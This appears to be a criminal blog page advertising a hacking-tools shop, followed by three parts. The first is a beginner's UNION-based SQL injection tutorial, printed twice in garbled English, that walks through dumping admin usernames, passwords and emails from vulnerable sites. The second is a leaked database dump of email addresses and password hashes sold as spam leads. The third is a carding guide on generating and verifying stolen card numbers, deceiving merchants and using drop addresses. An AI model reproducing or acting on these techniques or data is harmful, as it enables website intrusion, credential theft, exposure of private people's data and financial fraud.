ICQ:- 675452902-
https://spam-tools.cc
Thursday 10 September 2020
Tuesday 14 April 2020
smtp+zimbra inbox sender Hack via linux scanners
HELLO GUYS
TODAYS TOPIC IS ABOUT HOW TO MAKE MONEY VIA HACKING SCANNERS.
HOW TO SELL YOUR TOOLS OVER TOOLS SHOP THAT MAKE GOOD MONEY.
I SELL ALL KIND OF HACKING TOOLS. WORK FOR PEOPLE TO HACK AND SPY SOMEONE.
MY PRODUCTS LIST.
SPAMMING TOOLS
CPANEL
SHELL
SMTP
WEBMAIL
SCAM PAGE
CEO OR CFO LEADS
RDP WITH SEND BLUSTER
--------------------
SCANNERS,
CPANEL HACKING SCANNERS.
SMTP HACKING SCANNERS
RDP HACKING SCANNERS SSH ROOTS
--------------------
SPY VIRUS
CRYPTER
PRIVET HOSTING UNLIMTED -
--------------
CREDIT CARD SPAMMING
BANK SPAMMING TOOLS
DATING LOGS TOOLS
ANDROID SPY TOOLS
WINDOWS SPY TOOLS
------------------
https://spam-tools.cc/index.php
TODAYS TOPIC IS ABOUT HOW TO MAKE MONEY VIA HACKING SCANNERS.
HOW TO SELL YOUR TOOLS OVER TOOLS SHOP THAT MAKE GOOD MONEY.
I SELL ALL KIND OF HACKING TOOLS. WORK FOR PEOPLE TO HACK AND SPY SOMEONE.
MY PRODUCTS LIST.
SPAMMING TOOLS
CPANEL
SHELL
SMTP
WEBMAIL
SCAM PAGE
CEO OR CFO LEADS
RDP WITH SEND BLUSTER
--------------------
SCANNERS,
CPANEL HACKING SCANNERS.
SMTP HACKING SCANNERS
RDP HACKING SCANNERS SSH ROOTS
--------------------
SPY VIRUS
CRYPTER
PRIVET HOSTING UNLIMTED -
--------------
CREDIT CARD SPAMMING
BANK SPAMMING TOOLS
DATING LOGS TOOLS
ANDROID SPY TOOLS
WINDOWS SPY TOOLS
------------------
https://spam-tools.cc/index.php
This tutorial for beginners...
let's start over here
let me explain you how to work all thing.SQL injection is a code injection technique that exploits a security ready to attack its happen in the database coating of an application. The attack is performed when user input in other incorrectly filtered for after creation plain gateway of Data type root in SQL control or user input is not completely typed and there by unusually complete. It is an constructor of a more major class of attack that can happen though any time one programming or scripting language is root within another. SQL injection attacks are also familiar as SQL injection attacks.
whenever you need to do easily with help of tools then you read my previous tutorial using havij.
let me no you the part of game here is four steps. & nine categories .
Step 1. website Analysis
- Find a website exploits.
- Find a Verify quantity of columns.
- Find which column or victimize.
Step 2. Description Affairs.
- Discover the sql version.
- Find the database.
Step 3.The sold part
- Find the table names.
- Find the column names.
- Displaying the column content.
- Find the admin page.
website Analysis
In order for useing exploiting a website the first step we ar injecting into .
Find a website exploits.
website exploit can be found using google dorks (you will
must wrote to google find fresh dorks) either in google or
with an exploit scanner.
Dork are website URLs that are possible vulnerable
in sql injection these dork look like this.
CODE.
let's say we found the page:
CODE.
http//www.shopingsite.com/page.php?id=1"
OR
http//www.shopingsite.com/page.php?id="1
OR
press enter .if this website recover an error such as the following.
CODE.
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home1/michafj0/public_html/gallery.php on line 5
look like this mean it's vulnerable to injection
Diagnose the amount of column:
to using manual path commands and get sources we must required how much column here are on website.
to find the number of column i wrote a XQuery with with increased values beyond we get an error, like this.
CODE.
http//www.shopingsite.com/page.php?id=1 ORDER BY 1- <--no error
http//www.shopingsite.com/page.php?id=1 ORDER BY 2- <--no error
http//www.shopingsite.com/page.php?id=1 ORDER BY 3- <--no error
http//www.shopingsite.com/page.php?id=1 ORDER BY 4- <--no error
http//www.shopingsite.com/page.php?id=1 ORDER BY 5- <--ERROR
this means there are four column!
DON'T FORGET TO INCLUDE THE DOUBLE NULL (-)AFTER THE QUERY
MAJOR PART!
Find which column are vulnerable:
we know that there are four column now we find out which one are vulnerable to injection.to do this we use UNION & SELECT
Queries while keeping the double null (-) at the end of the string.
CODE.
http://www.shopingsite.com/php?is=1 UNION SELECT 1,2,3,4-
Don't forget to put the extra null (-) in between the "=" sign and the value (the number)
page.php?id=1
Now after including the Query you should be able to see number somewhere on the page that seem out place those are the number of the column that are vulnerable to injection. we can use those column to pull information from the database which we will see in part two.
Step 2. Description Affairs.
in this step we will find out how to find the database and
what version of SQL the website is using by using queries
to exploit the site.
Regulate the SQL version.
Discover the version of sql of the website is a very major step
because the step you take for version 4 are completely
different from version 5 in order to get what you wondering
in this tutorial i will not be cowling version 4.
you will see back to the end of step than we say how to
discover the vulnerable columns. using that information
we can through in sync our next query (it will using column
2 as an example) the command would look like this:
CODE.
http://www.shopingsite.com/php?is=1 UNION SELECT 1.@@version 3,4---
Since 2 is the vulnerable column, this is were we place "@@version "is version"is "version()"
if the website still does not display the version try using unhex (@@ version) which looks like this:
CODE.
http://www.shopingsite.com/php?is=1 UNION SELECT 1.unhex(hex(@@version)) 3,4--
NOTE: if this method is used here, it must be used for the rest of the injection as well.
Now that you wonder to see is something alone these lines:
CODE.
5.1.44-community-log
which is the version of the sql for the website.
NOTE:if you look version 4 and you should like to have a go at it
how to inject into it.
Discover the database
we use a query like the one below:
CODE:
http://www.shopingsite.com/php?is=1 UNION SELECT 1,concat(schemm _name ) 3,4 from information _schema.schemata--
this will take sometime return more result than necessary and so that is when we switchover to this query instead:
CODE:
http://www.shopingsite.com/php?is=1 UNION SELECT 1,concat(database()) 3,4--
now we want the name of database! congratulation. copy and past the name somewhere safe we'll need it for later.
Step Three - the major part
This is fun part where we will find the user name, email and password.
Discover the table name:
So first we found the table name to use a query that is same to the one use for found database with a little bit extra added on
CODE:
It may look long and confusing but once you understand it, it really isn't so. What this query does is it "groups" (group_concat) the "table names" (table_name) together and gathers that information "from" (FROM) information_schema.tables where the "table schema" (table_schema) can be found in the "database" (database()).
NOTE: While using group_concat you will only be able to see 1024 characters worth of tables so if you notice that a table is cut off on the end switch over to limit which I will explain now.
Code:
http://www.thesite.com/page.php?id=-1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1--
What this does is it shows the first and only the first table. So if we were to run out of characters on let's say the 31st table we could use this query:
Code:
http://www.thesite.com/page.php?id=-1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables WHERE table_schema=database() LIMIT 30,1--
Notice how my limit was 30,1 instead of 31,1? This is because when using limit is starts from 0,1 which means that the 30th is actually the 31st Tongue
You now have all the table names!
Finding the column names
Now that you have all of the table names try and pick out the one that you think would contain the juicy information. Usually they're tables like User(s), Admin(s),
tblUser(s) and so on but it varies between sites.
After deciding which table you think contains the information, use this query (in my example, I'll be using the table name "Admin"):
Code:
http://www.thesite.com/page.php?id=-1 UNION SELECT 1,group_concat(column_name),3,4 FROM information_schema.columns WHERE table_name="Admin"--
This will either give you a list of all the columns within the table or give you an error but don't panic if it is outcome #2! All this means is that Magic Quotes is turned on. This can be bypassed by using a hex or char converter (they both work) to convert the normal text into char or hex.
UPDATE: If you get an error at this point all you must do is follow these steps:
1. Copy the name of the table that you are trying to access.
2. Paste the name of the table into this website where it says "Say Hello To My Little Friend".
Hex/Char Converter
http://www.swingnote.com/tools/texttohex.php
3. Click convert.
4. Copy the string of numbers/letters under Hex into your query so it looks like this:
Code:
http://www.thesite.com/page.php?id=-1 UNION SELECT 1,group_concat(column_name),3,4 FROM information_schema.columns WHERE table_name=0x41646d696e--
Notice how before I pasted the hex I added a "0x", all this does is tells the server that the following characters are part of a hex string.
You should now see a list of all the columns within the table such as username, password, and email.
NOTE: Using the limit function does work with columns as well.
Displaying the column contents
We're almost done! All we have left to do is to see what's inside those columns and use the information to login! To view the columns we need to decide which ones we want to see and then use this query (in this example I want to view the columns "username", "password", and "email", and my database name will be "db123"). This is where the database name comes in handy:
Code:
http://www.thesite.com/page.php?id=-1 UNION SELECT 1,group_concat(username,0x3a,password,0x3a,email),3,4 FROM db123.Admin--
In this query, 0x3a is the hex value of a colon ( which will group the username:password:email for the individual users just like that.
FINALLY! Now you have the login information for the users of the site, including the admin. All you have to do now is find the admin login page which brings us to Section Four.
Finding the admin page
Usually the admin page will be directly off of the site's home page, here are some examples:
Code:
http://www.thesite.com/admin
http://www.thesite.com/adminlogin
http://www.thesite.com/modlogin
http://www.thesite.com/moderator
Once again there are programs that will find the page for you but first try some of the basic guesses, it might save you a couple of clicks. If you do use a program
Reiluke has coded one for that as well. Search Admin Finder by Reiluke.
And that conlcudes my tutorial! I hope it was helpful to some of you. Remember to keep practicing and eventually you'll have all of the queries memorized in no time!
1.SQL INSERTION ATTACKS.....
let's start over here
let me explain you how to work all thing.SQL injection is a code injection technique that exploits a security ready to attack its happen in the database coating of an application. The attack is performed when user input in other incorrectly filtered for after creation plain gateway of Data type root in SQL control or user input is not completely typed and there by unusually complete. It is an constructor of a more major class of attack that can happen though any time one programming or scripting language is root within another. SQL injection attacks are also familiar as SQL injection attacks.
whenever you need to do easily with help of tools then you read my previous tutorial using havij.
let me no you the part of game here is four steps. & nine categories .
Step 1. website Analysis
- Find a website exploits.
- Find a Verify quantity of columns.
- Find which column or victimize.
Step 2. Description Affairs.
- Discover the sql version.
- Find the database.
Step 3.The sold part
- Find the table names.
- Find the column names.
- Displaying the column content.
- Find the admin page.
website Analysis
In order for useing exploiting a website the first step we ar injecting into .
Find a website exploits.
website exploit can be found using google dorks (you will
must wrote to google find fresh dorks) either in google or
with an exploit scanner.
Dork are website URLs that are possible vulnerable
in sql injection these dork look like this.
CODE.
let's say we found the page:
CODE.
http//www.shopingsite.com/page.php?id=1"
OR
http//www.shopingsite.com/page.php?id="1
OR
press enter .if this website recover an error such as the following.
CODE.
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home1/michafj0/public_html/gallery.php on line 5
look like this mean it's vulnerable to injection
Diagnose the amount of column:
to using manual path commands and get sources we must required how much column here are on website.
to find the number of column i wrote a XQuery with with increased values beyond we get an error, like this.
CODE.
http//www.shopingsite.com/page.php?id=1 ORDER BY 1- <--no error
http//www.shopingsite.com/page.php?id=1 ORDER BY 2- <--no error
http//www.shopingsite.com/page.php?id=1 ORDER BY 3- <--no error
http//www.shopingsite.com/page.php?id=1 ORDER BY 4- <--no error
http//www.shopingsite.com/page.php?id=1 ORDER BY 5- <--ERROR
this means there are four column!
DON'T FORGET TO INCLUDE THE DOUBLE NULL (-)AFTER THE QUERY
MAJOR PART!
Find which column are vulnerable:
we know that there are four column now we find out which one are vulnerable to injection.to do this we use UNION & SELECT
Queries while keeping the double null (-) at the end of the string.
CODE.
http://www.shopingsite.com/php?is=1 UNION SELECT 1,2,3,4-
Don't forget to put the extra null (-) in between the "=" sign and the value (the number)
page.php?id=1
Now after including the Query you should be able to see number somewhere on the page that seem out place those are the number of the column that are vulnerable to injection. we can use those column to pull information from the database which we will see in part two.
Step 2. Description Affairs.
in this step we will find out how to find the database and
what version of SQL the website is using by using queries
to exploit the site.
Regulate the SQL version.
Discover the version of sql of the website is a very major step
because the step you take for version 4 are completely
different from version 5 in order to get what you wondering
in this tutorial i will not be cowling version 4.
you will see back to the end of step than we say how to
discover the vulnerable columns. using that information
we can through in sync our next query (it will using column
2 as an example) the command would look like this:
CODE.
http://www.shopingsite.com/php?is=1 UNION SELECT 1.@@version 3,4---
Since 2 is the vulnerable column, this is were we place "@@version "is version"is "version()"
if the website still does not display the version try using unhex (@@ version) which looks like this:
CODE.
http://www.shopingsite.com/php?is=1 UNION SELECT 1.unhex(hex(@@version)) 3,4--
NOTE: if this method is used here, it must be used for the rest of the injection as well.
Now that you wonder to see is something alone these lines:
CODE.
5.1.44-community-log
which is the version of the sql for the website.
NOTE:if you look version 4 and you should like to have a go at it
how to inject into it.
Discover the database
we use a query like the one below:
CODE:
http://www.shopingsite.com/php?is=1 UNION SELECT 1,concat(schemm _name ) 3,4 from information _schema.schemata--
this will take sometime return more result than necessary and so that is when we switchover to this query instead:
CODE:
http://www.shopingsite.com/php?is=1 UNION SELECT 1,concat(database()) 3,4--
now we want the name of database! congratulation. copy and past the name somewhere safe we'll need it for later.
Step Three - the major part
This is fun part where we will find the user name, email and password.
Discover the table name:
So first we found the table name to use a query that is same to the one use for found database with a little bit extra added on
CODE:
http://www.shopingsite.com/php?id=1 UNION SELECT 1.group _ concert(table_name) 3,4 from information schema . table schema=database()--
It may look long and confusing but once you understand it, it really isn't so. What this query does is it "groups" (group_concat) the "table names" (table_name) together and gathers that information "from" (FROM) information_schema.tables where the "table schema" (table_schema) can be found in the "database" (database()).
NOTE: While using group_concat you will only be able to see 1024 characters worth of tables so if you notice that a table is cut off on the end switch over to limit which I will explain now.
Code:
http://www.thesite.com/page.php?id=-1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1--
What this does is it shows the first and only the first table. So if we were to run out of characters on let's say the 31st table we could use this query:
Code:
http://www.thesite.com/page.php?id=-1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables WHERE table_schema=database() LIMIT 30,1--
Notice how my limit was 30,1 instead of 31,1? This is because when using limit is starts from 0,1 which means that the 30th is actually the 31st Tongue
You now have all the table names!
Finding the column names
Now that you have all of the table names try and pick out the one that you think would contain the juicy information. Usually they're tables like User(s), Admin(s),
tblUser(s) and so on but it varies between sites.
After deciding which table you think contains the information, use this query (in my example, I'll be using the table name "Admin"):
Code:
http://www.thesite.com/page.php?id=-1 UNION SELECT 1,group_concat(column_name),3,4 FROM information_schema.columns WHERE table_name="Admin"--
This will either give you a list of all the columns within the table or give you an error but don't panic if it is outcome #2! All this means is that Magic Quotes is turned on. This can be bypassed by using a hex or char converter (they both work) to convert the normal text into char or hex.
UPDATE: If you get an error at this point all you must do is follow these steps:
1. Copy the name of the table that you are trying to access.
2. Paste the name of the table into this website where it says "Say Hello To My Little Friend".
Hex/Char Converter
http://www.swingnote.com/tools/texttohex.php
3. Click convert.
4. Copy the string of numbers/letters under Hex into your query so it looks like this:
Code:
http://www.thesite.com/page.php?id=-1 UNION SELECT 1,group_concat(column_name),3,4 FROM information_schema.columns WHERE table_name=0x41646d696e--
Notice how before I pasted the hex I added a "0x", all this does is tells the server that the following characters are part of a hex string.
You should now see a list of all the columns within the table such as username, password, and email.
NOTE: Using the limit function does work with columns as well.
Displaying the column contents
We're almost done! All we have left to do is to see what's inside those columns and use the information to login! To view the columns we need to decide which ones we want to see and then use this query (in this example I want to view the columns "username", "password", and "email", and my database name will be "db123"). This is where the database name comes in handy:
Code:
http://www.thesite.com/page.php?id=-1 UNION SELECT 1,group_concat(username,0x3a,password,0x3a,email),3,4 FROM db123.Admin--
In this query, 0x3a is the hex value of a colon ( which will group the username:password:email for the individual users just like that.
FINALLY! Now you have the login information for the users of the site, including the admin. All you have to do now is find the admin login page which brings us to Section Four.
Finding the admin page
Usually the admin page will be directly off of the site's home page, here are some examples:
Code:
http://www.thesite.com/admin
http://www.thesite.com/adminlogin
http://www.thesite.com/modlogin
http://www.thesite.com/moderator
Once again there are programs that will find the page for you but first try some of the basic guesses, it might save you a couple of clicks. If you do use a program
Reiluke has coded one for that as well. Search Admin Finder by Reiluke.
And that conlcudes my tutorial! I hope it was helpful to some of you. Remember to keep practicing and eventually you'll have all of the queries memorized in no time!
Thursday 30 June 2016
Shopping Spam Fresh Leads MySQL databases (freescience.infofreescience_info_1-users
++++++++ uid|login|pass hash|mail|signature ++++++++
8|1235140109|9be406b86c39d7ab8bf505fa70f62b5f|aovallegont@yahoo.com|
14|1235412777|f0980a7b905196cd4f2737ede8dfde36|carolina.roman@yahoo.com|
16|1235395485|a55be702ef85f77460af7809cd271b37|claudio.attaccalite@gmail.com|
4|1236084611|13df296d7d8ba023bfd6847621c0b518|andrea.calce@gmail.com|
27|0|092e3da2d53e2647146642c9d267b7e5|jeezveez@yahoo.com|
17|0|d08a0fe87db863ccdc9d261d3e312d79|danielecico87@yahoo.it|
26|1236089934|a0240b327cc7eac789d7ad30a1e76184|jdamia@gmail.com|
37|0|12fc41dac2fbc3daac5faf7405f98749|rakiboye@yahoo.co.uk|
39|0|bcfcec2d56b63665e665b4e0c63927ad|vancho32@gmail.com|
9|0|f115cb33f5bd0ccda2d8fa3ca4d1c352|avj12@rediffmail.com|
29|0|ed8b4319ae18e9f17eb90e9556378172|jossim@gmail.com|
20|0|a0b024d76d3201c8bd97e76618444931|guinnessvod87@hotmail.it|
40|0|32680ad3e4eda9c76c9698b286f5e125|ville.parkkinen@yahoo.com|
23|0|1334915d11d0cf53f277aea30faa3c34|hmb.alam@gmail.com|
41|0|f5d254022d0c8f33bb75a06882631526|www.nadia_adel21@yahoo.com|
31|0|c64facc2166c811a0391bb35023035ee|linakouf@otenet.gr|
35|1236124465|18698cd279874ff53f9c4cc83f49a9b6|oshima_alisa@yahoo.com|
42|0|bf06dfe53bb778f746e8ba4842b89830|xavier@tddft.org|
25|0|83acab5799540afe33bb4c526e874b61|huydung1218@yahoo.com|
11|1235842948|65636e4f1db835d848bb67745f97b9c6|big_dreamz@rediffmail.com|
12|1235229109|37a2f4ad935e8f9d9af14ded71a73e38|bio102009@hotmail.com|
32|1236082080|3b0e8fcebdedf5fb32586e1b398d5c14|ls.baldari@gmail.com|
22|1235674936|2836a2c2327518a2b79f6d709d8774f7|hans-peter.eckle@gmx.net|
3|1236073712|9be406b86c39d7ab8bf505fa70f62b5f|amarques@gmail.com|
38|1236084214|44053617368ae38458601cbeaf31b2b3|rc@mclink.it|
18|1235566254|4daae7f905c9b1679d5c6b19a46971bd|dsvkgupta@yahoo.co.uk|
34|1236115826|090d1dc24b0c6d5a25fc58676d002e85|moumita.dey@saha.ac.in|
24|1236074422|ac0e194be87c469bfd406593278c41a4|huanggang08@163.com|
15|1235472886|2999bbd2083b9afdface3bd57caec778|cbres399@uwsp.edu|
43|0|c75be2c9a74800fdc302611a62a8c927|youshie01@yahoo.fr|
33|0|ba0f3c1ab92cf1cac26f026c3a67cade|moh_76us@yahoo.com|
10|1235836634|48e24c8fea379ce9b887dbbe30b0cce4|aydingelmez@gmail.com|
36|0|5699ce36b6bb869e9d3518d2afb2a30b|ottavio.figo@gmail.com|
13|1235428515|fb71c1e4fb3d204309d35394d7110b7d|carolina.roman.salgado@gmail.com|
21|1235568991|ab3270a37542bb2d3a841bf18cd6406c|gui_tharlot@msn.com|
19|0|28e17f6a38e4e59d311ff91cb8d8f1f4|espinosa.leal@gmail.com|
28|0|6590a5fcfe05ff7463b7e498a7a68ed1|jimperio@gmail.com|
30|0|6ac8494f5f8a960587c0334fce9883f4|Kalthom_777_hi@yahoo.com|
1|0|e8c27d08c20a017dd556d06de991c43c|alex23mail@yahoo.it|
Wednesday 13 January 2016
Carding Tutorials with Info Bines
The information is including of tricks and get money that have use past for buddy the golf purpose of private shop other profit dessis those knowledge keep enjoy.
Hello to: Fry Guy("You've got to hear about this new scam. . .")
I. Card Types
The first digit of the credit card number (henceforth referred to as CCN)determines the credit card type. A simple list might be:
First Digit of Credit Card Card Type
------------------------------ -------------
3 American Express
4 Visa
5 Mastercard
6 Discover
II. Bank and Branch Numbers
Sample Credit Card: 1234 567 890 123
Within the first group of numbers from the left [called Group 4] the Bank name and branch are contained. We have already discovered that the first digit of Group 4 reveals the card type. We will now look at how to decipher which bank issued the card, and which branch of the bank the actual card holder banks at. Look at the Second, Third, and Fourth digits of Group 4. These three numbers tell which bank issued the card. A small list follows this paragraph,
although you can compile a list by yourself. Just glance at cards you get your hands on which the bank name is printed, and record the information. [ Editor's
Note: This is a hard concept to explain, so let me give you an example. Let's say Bank of Hicksville's group 4 Visa Credit Card reads 4560. (560 = Bank of Hicksville). BUT, 4561 is NOT necessarily Bank of Hicksville, too. 4561 could be Bank of Boonies ville. So what I am trying to get across is that the next bank in line doesn't HAVE to be 4570 -- it could be earlier in numbers. ]
----------VISA---------
Group 4 Bank Name
-------- ---------
4019 Bank of America
4024 Bank of America
4052 First Cincinnati
4060 Navy Federal Credit Union
4128 Citibank
4131 State Street Bank
4215 Marine Midland
4225 Chase Manhattan
4231 Chase Lincoln First Classic
4232 Chase Lincoln First Classic
4241 Nat. Westminster Bank
4250 First Chicago Bank
4271 Citibank Preferred
4302 H.H.B.C.
4310 Imperial Savings
4317 Gold Dome
4387 Bank One
4428 Bank of Hoven
4811 Bank of Hawaii
4897 Village bank of Cincinnati
----------Master cards-----------
Group 4 Bank Name
--------- --------------
5215 Marine Midland
5217 Manufacturers Hanover Trust
5233 Huntington Bank
5242 Chevy Chase Federal Savings
5254 Bank of America
5263 Chemical Bank
5273 Bank of America
5286 Chase Lincoln First
5317 Norwest
5323 Bank of New York
5329 Maryland Bank NA (MBNA)
5410 Citibank Preferred
5411 1st Fin. bank of Omaha
5414 Nat. Westminster Bank
5415 Colonial National Bank
5424 Citibank
5465 Chase Manhattan
5678 Marine Midland
III. Bank Codes [ International Bank or Interlink Numbers]
These are used in checking credit. Later on, you will learn that while checking the credit cards for the amount of credit, you will be prompted to enter the Bank ID along with the Merchant ID. The bank IDs are, I believe, from the following list. One note-- you cannot just choose any Bank ID and use it with any merchant ID. They must correspond in some way. How, I don't know. I THINK that a bank issues a merchant number to each of their customers. If you try to use a merchant number with a bank number, and the merchant doesn't actually use the bank that is specified by the bank number, you are going to get some problems. (ie, the verification won't go through.) Again, I will state that this is only a theory. The reason that I post this theory is to get minds working. So far, no one has mentioned their ideas on the function of Bank Codes. If you do happen to find out the true meaning of these numbers, please get in touch with me so I can update this list. Thanks. One word- on VISA credit cards, the bank IDs are the first 4 digits of the Card. For Mastercards, however, they vary. A list follows:
Bank Bank Code
---- ---------
Chemical Bank 1263
Marine Midland 6207 [1207?]
Manufacturers Hanover Trust 1033
Citibank 1035
Huntington 1226
First Card Gold 1286
MBNA 6017
Chase Manhattan 1665
[ Bank from 5127 ] 1015
IV. "Group 3"
Sample Credit Card: 1234 5678 9012 3456
^
|
|
Group 3, or the second group on a credit card in from the left, contains some VERY useful information about the card. This group
holds the information on the Maximum Expiration Date and the Maximum Credit Limit. (I believe that you can all see the benefits of this.) This does not mean, however, that the ACTUAL expiration date and ACTUAL credit limit are in this group. What it means is this: When the different Credit Card Companies
issue Credit Cards to the consumer, he of course has a credit limit. And when the Companies formulate credit cards, they create certain groups for certain customers. That is, certain "groups" contain all the credit cards for people with a credit limit between $x and $y. The same thing goes with the expiration dates. Everyone whose card expires after m1/y1 and before m2/y2 has their
credit card in a certain group formulated by the company. For example: My name is Joe Schmoe. My Visa credit card expires in January of the year 1999. My credit limit on this card is $7,000. My credit card number (CCN) will probably be in the same group as my brother-in-law Jack Koff whose card expires in December of 1998 and whose credit limit is $6,000. BUT, our cards will be in
different groups entirely than my boss' whose card expires in June of 1995 and whose credit limit is $40,000.
Back to the point of section IV: Lets say you have a credit card with a known expiration date and known credit limit. Lets also say that you happen upon
ANOTHER credit card whose numbers are the same up until the last 2 groups. (You and I see that these two cards were issued by the same bank and PROBABLY have a credit limit in the same ball park and an expiration date not far from each other. ) BUT, even though you have this new credit card, you lost the expiration date and credit limit. GOSH! How are you going to use this card when you don't know this information??
APPROXIMATE! You have a general idea now, and
you can go from there.
One warning here: I have found that small groups of cards with high credit limits are often hidden in between large groups of cards with very low credit limits. For instance, lets look at this card: 4123 4567 8901 2345. From -4567 until 4600 in group 3 (from the right) gold cards may exist. But after 4600 and before 4567, cards with credit limits of $500 exist. Kind of sucks, huh?? Just
wanted to make you aware of this.
Now, once you learn how to modify these without hurting the card, you have increased your value as a carder by 100x. But be careful. Often when you modify a card's group 3 to get a higher credit limit line of cards, you will find the entire line is dead. Or, in other cases, just the original card you find is dead, and all surrounding cards are valid with the new credit limits.
V. "Group 2" & "Group 1"
These two groups, or the last two groups on the credit card, are the easiest to modify. By changing these in such a way, you can formulate new credit cards simply by doing a little math in your head. These two groups contain the IDentification codes. Later on in your carding careers, you might find out how to change these, and thus, you have found the secret to a vault of new and awaiting credit cards. I stress here that the only purpose that these two groups serve is to differentiate between customers. If the first two groups of two cards are the same and the last two groups of two cards are different,the two cards were issued by the same bank and probably have similar credit limits, but are of course issued to different people.
VI. Credit Card Verification
Once you have a newly formulated or newly found Credit Card, you must first check to see if it is valid before you distribute or use it. The reason for this is this: Although you may not have faltered in your calculations, and you created a credit card following the correct formula, the card may turn up as invalid. This is because it has not been issued yet. Visa or Mastercard has not issued that card to a customer yet. You are ahead of the credit card company. (Don't you feel important??!) If this case arises, simply formulate a new credit card from the original valid credit card, and check it once again. There is no known way around this except to wait.
OKAY- you want to check your credit card and see how much money this person has. There are many, many credit verifiers around. The easiest way to get ahold of one is to go into any store which accepts credit cards and look on the side of the machine that imprints the carbons with the credit card number, etc. Or, look right on the wall next to the register. There should be a number to call, a merchant number, and perhaps a bank number. Jot these down and head on home. The format for these is usually different, but all have the basic idea in mind. Call an operator of some sort, tell her the authorization information that she asks for
(bank number,merchant number, etc) and give her the card and
the amount for which to verify the card. She will check and let you know if ithas enough credit left. Simple. BUT
*********** ONE NOTE *************
When you check a card for a certain amount of money, that amount of money is subtracted from the amount available on the card. For example, if a card has $5,000 left on it, and you get ahold of it and check it for $2,000, you can only spend $3,000 before it tells you that you don't have the necessary credit to go through with a transaction.
VII. Purchasing Merchandise: The Real Story
OKAY, now that you have a VALID credit card, you will most likely want to get some newly acquired merchandise. This is all fine and dandy, but if you don't know what you are doing, you can get yourself and most likely your friends in a LOT of trouble.
---------------------------------------------------------------------------
*** WARNING : NEVER ORDER SOMETHING FROM YOUR HOUSE. ALWAYS GO OUT TO A ***
*** PAY PHONE. ALSO, ALWAYS HAVE A STORY WORKED OUT BEFORE YOU CALL. ***
*** THAT IS, YOUR NAME, ADDRESS, JOB, PHONE NUMBER, EXCUSE FOR NOT BEING***
*** HOME, MOTHER'S MAIDEN NAME, ETC. ANY STUTTERING OR HESITATION COULD ***
*** BLOW THE WHOLE SHOW !!! !!! !!! !!! !!! !!! !!! !!! !!! !!!***
---------------------------------------------------------------------------
FIRST- Let me clarify something. When you order something over the phone, and the person selling you the items wants to know the actual Cardholder's name, address, phone number, etc, you DO NOT have to give him/her the correct information. [UNLESS: You do have to give the person correct information if they have an online connection to a credit record bureau such as CBI or TRW. In
this case, as they can verify everything that you say in a matter of moments, just do your best, get a new card, and never order from this company again. I will not lie to you: some companies do have this capability. But if you stick with little businesses who need your money, you'll do fine. ] Bullshit your way through. Or hire a social engineer to do it for you. You do not even have to give the correct expiration date! Almost Any expiration date will work as long as it is at least one month ahead of the current month and it is not TOO
far ahead in time so that it jumped over the actual expiration date. (ie, if the current date is 10/89, give the expiration date 11/89 -- simple) The company from which you are buying things can not verify the extra information YOU give them until after the order has been processed and the package shipped. They have to get in touch with a Credit Union, which will be discussed later on in this summary, to verify it all.
* ALL THAT THEY CAN VERIFY PRONTO IS THAT
THE CREDIT CARD IS VALID, AND THAT IT HAS ENOUGH CREDIT TO PAY FOR THE
MERCHANDISE YOU ARE PURCHASING. *
My suggestion, however, is that you give them
the phone number of a pay phone near your house. [ Or, if you want to REALLY make sure things go smoothly, give them the number of a direct dial VMB local to the shipping address. ] If they want to call you back, FINE. Ask them to do so between the hours of X pm and Y pm. And, just pitch tent at the phone for a few hours a night. No problem. They will almost always call right back, since
they don't want to inconvenience their customer who happens to be buying $6,000 worth of computers at the time. Understand?
SECOND- Where should I ask have them ship it to, you ask? Fret not, my little friend in carding. Before you call and order your things, first go out and find an abandoned house. These still work best. Either one that has been moved out of, and no one has moved into yet. Or, if you can, find one that is
REALLY
abandoned. (BUT MAKE SURE IT HAS A STREET ADDRESS THAT THE POSTMAN OR UPS MAN
CAN FIND!)
Jot down this address. This is referred to as a drop site.
[ Ed. Note: if, and I say IF you can rent a mailbox, do so. Make sure they sign for everything (UPS, etc) and bring some FAKE ID with you to open it up. Most of the time, they will give you hassle, and verify EVERYTHING you give them. So it is really not that easy to get one of these. At least try, though. ] OKAY,give this address to the man or lady who is taking your order. Tell them this
is where you live. REMEMBER, they can not verify that you don't live there for quite a while. They will send everything there. When the shipment comes (either Overnight, Second Day, or whenever), pick it up (CASUALLY) and stroll home to open your package. If it does not come, or if the salesperson gives you trouble, don't worry. If it didn't come, it is because 1) It got intercepted by
the feds or 2) The company didn't process it because they did actually try to verify your address, name, and phone number, thus delaying your shipment, but saving themselves a lot of money. Just try another store until you find some place that is easy to buy from.
THIRD- I suggest that you do not furnish your household with carded items. It is just not wise. Get a few things, if you like, and wait a little while. Sit tight. When things cool down, you might want to get some more things.
REMEMBER-
all things are good in proportion, but when you get out of that proportion (ie,get greedy and order a new house) you will most definitely get caught sometime or another. Patience is the carder's best friend. (along, of course, with theVISA formula... hehe)
FOURTH- You have all heard it before. DON'T DISPLAY YOUR SPECIAL TALENT AT SCHOOL, PARTIES, OR SOCIAL EVENTS.
Not even to your best friends. ESPECIALLY
not to your best friends. They are the ones most likely to brag about you and spread the word. This is the farthest thing from what you want. Keep it to yourself, and if you must tell someone about it, either call Phone Sex, a Bridge, or an Alaskan Operator. Those are your only choices, as no other carder or phreak wants to hear about how good you actually are.
FIFTH- I wouldn't advise making a business out of this, either. Sure, if you want to get a few dollars for things you order (and that you don't want anymore) sell it and keep the money. But its purely asinine to take "orders" from people for money. And even if you don't want money. Keep in mind that Credit Fraud IS a felony, and getting caught violating US Federal Laws is not a fun experience to go through. Do you want to go to jail for 10 years, and never again be able to get a good job because Joey down the street wanted to pay $10 for a new skateboard that retails for $75?? Thats what I thought. Your whole goal in life, as long as you participate in the Underground Arts, is to keep a low profile.
VIII. Getting Credit Cards
There are a number of ways through which you can get credit cards.
